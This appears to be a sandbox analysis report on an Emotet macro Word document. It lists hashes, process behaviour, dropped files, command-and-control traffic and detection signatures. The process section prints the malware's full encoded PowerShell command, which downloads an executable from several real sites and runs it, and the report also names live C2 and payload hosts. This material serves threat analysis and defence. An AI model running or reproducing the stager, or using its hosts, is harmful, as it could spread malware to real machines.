analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

3.doc

Full analysis: https://app.any.run/tasks/ff03ccbc-dfdd-4f0e-a7ad-4ec9f4cc405a
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 18, 2019, 20:27:30
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Island Exclusive, Subject: optical, Author: Justen Corkery, Comments: Maine, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:32:00 2019, Last Saved Time/Date: Wed Sep 18 15:32:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

B567E1B7D39BAD0E22D7D4FED5FDA016

SHA1:

E070715F08E5490FC11DE44842F150AEFE265552

SHA256:

203D07F2686D1CB2849B204E2884B27C1E70F6049CFA280C5831C5209DB12393

SSDEEP:

6144:VN1qmTgpbxDj2kCUSfp40gTPLkIq7NSU4jJntATfDfBePi7Q:VN1qmTgpbxDj2kCUSfp40g/Xq7NSU4VR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 133.exe (PID: 3796)
      • 133.exe (PID: 2280)
      • easywindow.exe (PID: 4080)
      • easywindow.exe (PID: 3320)
      • easywindow.exe (PID: 2328)
      • 133.exe (PID: 3924)
      • 133.exe (PID: 2732)
      • easywindow.exe (PID: 3216)
    • Emotet process was detected

      • 133.exe (PID: 2732)
    • Changes the autorun value in the registry

      • easywindow.exe (PID: 4080)
    • Connects to CnC server

      • easywindow.exe (PID: 4080)
    • EMOTET was detected

      • easywindow.exe (PID: 4080)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2364)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2364)
      • 133.exe (PID: 2732)
    • Creates files in the user directory

      • powershell.exe (PID: 2364)
    • PowerShell script executed

      • powershell.exe (PID: 2364)
    • Application launched itself

      • 133.exe (PID: 3796)
    • Starts itself from another location

      • 133.exe (PID: 2732)
    • Connects to server without host name

      • easywindow.exe (PID: 4080)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2748)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2748)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2364)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Parker
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 641
Paragraphs: 1
Lines: 4
Company: Blanda - Anderson
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 547
Words: 95
Pages: 1
ModifyDate: 2019:09:18 14:32:00
CreateDate: 2019:09:18 14:32:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Maine
Keywords: -
Author: Justen Corkery
Subject: optical
Title: Island Exclusive
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
7
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 133.exe no specs 133.exe no specs 133.exe no specs #EMOTET 133.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
2748"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\3.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2364powershell -encod JABQAGEAaQAxAFUAaQAxADMAPQAnAHAAQQBUAGMAUwBqAGwAJwA7ACQAdwBpAGEAWQBXAEUAIAA9ACAAJwAxADMAMwAnADsAJABqAEwAXwBLAG4AUwBaADIAPQAnAGQAYgB0AFoARAAzAHUAaQAnADsAJABHADIAdwB2AEEATwBDAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAYQBZAFcARQArACcALgBlAHgAZQAnADsAJAB6ADUARQB3AE8AMgB2AD0AJwBzAHoATwBHAFAASwAnADsAJABRADgAawB6AGoAegAwAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAEUAbgBUADsAJABuAGIATABPAE4AZABXAFYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAYQB0AHIAaQBjAGsAZwBsAG8AYgBhAGwAdQBzAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGYAUwBSAGsAQQBGAGoAcQB2AC8AQABoAHQAdABwAHMAOgAvAC8AcABpAHAAaQB6AGgAYQBuAHoAaABhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AMwBjAGkAbwByAG4AegBfAGkAdQBsAGEAeQBzAGMAegAtADYANwA5ADYANAA2AC8AQABoAHQAdABwAHMAOgAvAC8AdABhAG4AawBoAG8AaQAuAHYAbgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFgAVABTAHUAZwB6AE4AYQB6AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAHUAcABlAHIAYwByAHkAcwB0AGEAbAAuAGEAbQAvAHcAcAAtAGEAZABtAGkAbgAvAFAAZABNAEkAbgBTAGcAcwAvAEAAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbAAtAGIAcgBpAHMAdABvAGwALgBsAHUALwBkAGwAcgB5AC8ATQBBAG4ASgBJAFAAbgBZAC8AJwAuACIAUwBwAGAAbABpAHQAIgAoACcAQAAnACkAOwAkAFEATgBCAEUAXwByADkAPQAnAE8ANQBaAGEAMQBDAFUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMANgBmADgAUgBXAFIAIABpAG4AIAAkAG4AYgBMAE8ATgBkAFcAVgApAHsAdAByAHkAewAkAFEAOABrAHoAagB6ADAALgAiAGQAYABPAFcAYABOAGwATwBBAEQAYABGAGkATABFACIAKAAkAFMANgBmADgAUgBXAFIALAAgACQARwAyAHcAdgBBAE8AQwApADsAJABwAEgATAA3AHcAaAA9ACcAUQBMAFYAVgBkAFAAOAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEcAMgB3AHYAQQBPAEMAKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAyADgAOAAwADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAFQAIgAoACQARwAyAHcAdgBBAE8AQwApADsAJABvAFMAOQBNAEcAOQAzAD0AJwBFADEAQgB1ADYAagBPAFgAJwA7AGIAcgBlAGEAawA7ACQAVABiAGYASgBhAFkAPQAnAEIAegBwAGMAXwBaAHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABtAEEATwBFAE4APQAnAG0AUgBiAGIAMQBQADMAOAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2280"C:\Users\admin\133.exe" C:\Users\admin\133.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3796"C:\Users\admin\133.exe" C:\Users\admin\133.exe133.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3924--8ddf1eefC:\Users\admin\133.exe133.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2732--8ddf1eefC:\Users\admin\133.exe
133.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2328"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe133.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3216"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3320--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
4080--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 774
Read events
1 281
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
2748WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR88DC.tmp.cvr
MD5:
SHA256:
2748WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B7DEA70F335E5DDC93FE702864A27887
SHA256:5E4B0BB068B9758D42C59BDBB3E585A771C8BE51EE88F713369718C081896434
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\22FFF4C1.wmfwmf
MD5:79DE66606BBBAC96BD2D6DD76830A069
SHA256:59685AF20D2BDAF75669F08712272E91043EFD3E1705DE94A876E4212B063F57
2748WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:71617902AC02F2AEFC941CCF5B3BD9F0
SHA256:C483A9477D69E2EF62788D3AF8A6CF88D9D3E1D861899B5E5D22FB6EBD70C1A7
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31CA2DFB.wmfwmf
MD5:EC7E10D53EA96B5086DC64C708693B91
SHA256:9AAF904D900DC5754E132DA41E854385CFAC574AE4DC11FB8855853D89952061
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\17235162.wmfwmf
MD5:B419C90F42F3A4C5D5601F2F63E4E4C0
SHA256:06874DA9DB510979C840838C515DD39001F605663AB249CB831FB165E93249E7
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E2F243F.wmfwmf
MD5:324136F50413D5BFAAAFF47C70CBCCFC
SHA256:7FED9D040B0AB7E378FB4599203344AE3B6C43BF74A0881B69F6C05BA2C05882
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CD796B3.wmfwmf
MD5:5A2A34B1326F8E5A7E7520756FACB453
SHA256:65F1825FFC171C61A0089833BE1336158C41F217806636BD3EAB7374431AEE76
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A7959D.wmfwmf
MD5:617E68E1534C158FE8A836D58564A67B
SHA256:45EB5B19793953AADE7B553DF525AAA92DED67530E814EA3C8A9947DAD13EB45
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8AFCF134.wmfwmf
MD5:597872C11ED292C466AB6B41973A1DC9
SHA256:504B99306569BEF0BAB66452F7FAA1F4C019337591DA88D20F507001DC2D8928
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
4
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4080
easywindow.exe
POST
200
190.18.146.70:80
http://190.18.146.70/forced/xian/ringin/merge/
AR
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4080
easywindow.exe
190.18.146.70:80
CABLEVISION S.A.
AR
malicious
2364
powershell.exe
148.251.180.153:443
www.patrickglobalusa.com
Hetzner Online GmbH
DE
malicious
2364
powershell.exe
111.67.206.122:443
pipizhanzhang.com
China Unicom Beijing Province Network
CN
unknown

DNS requests

Domain
IP
Reputation
www.patrickglobalusa.com
  • 148.251.180.153
malicious
pipizhanzhang.com
  • 111.67.206.122
unknown

Threats

PID
Process
Class
Message
4080
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
4080
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3 ETPRO signatures available at the full report
No debug info